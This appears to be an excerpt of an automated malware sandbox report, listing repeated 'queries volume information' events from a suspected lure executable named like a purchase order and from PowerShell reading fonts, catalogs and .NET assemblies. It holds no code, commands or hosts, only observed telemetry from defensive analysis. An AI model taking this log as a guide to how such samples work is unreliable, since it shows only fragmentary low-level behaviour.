Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
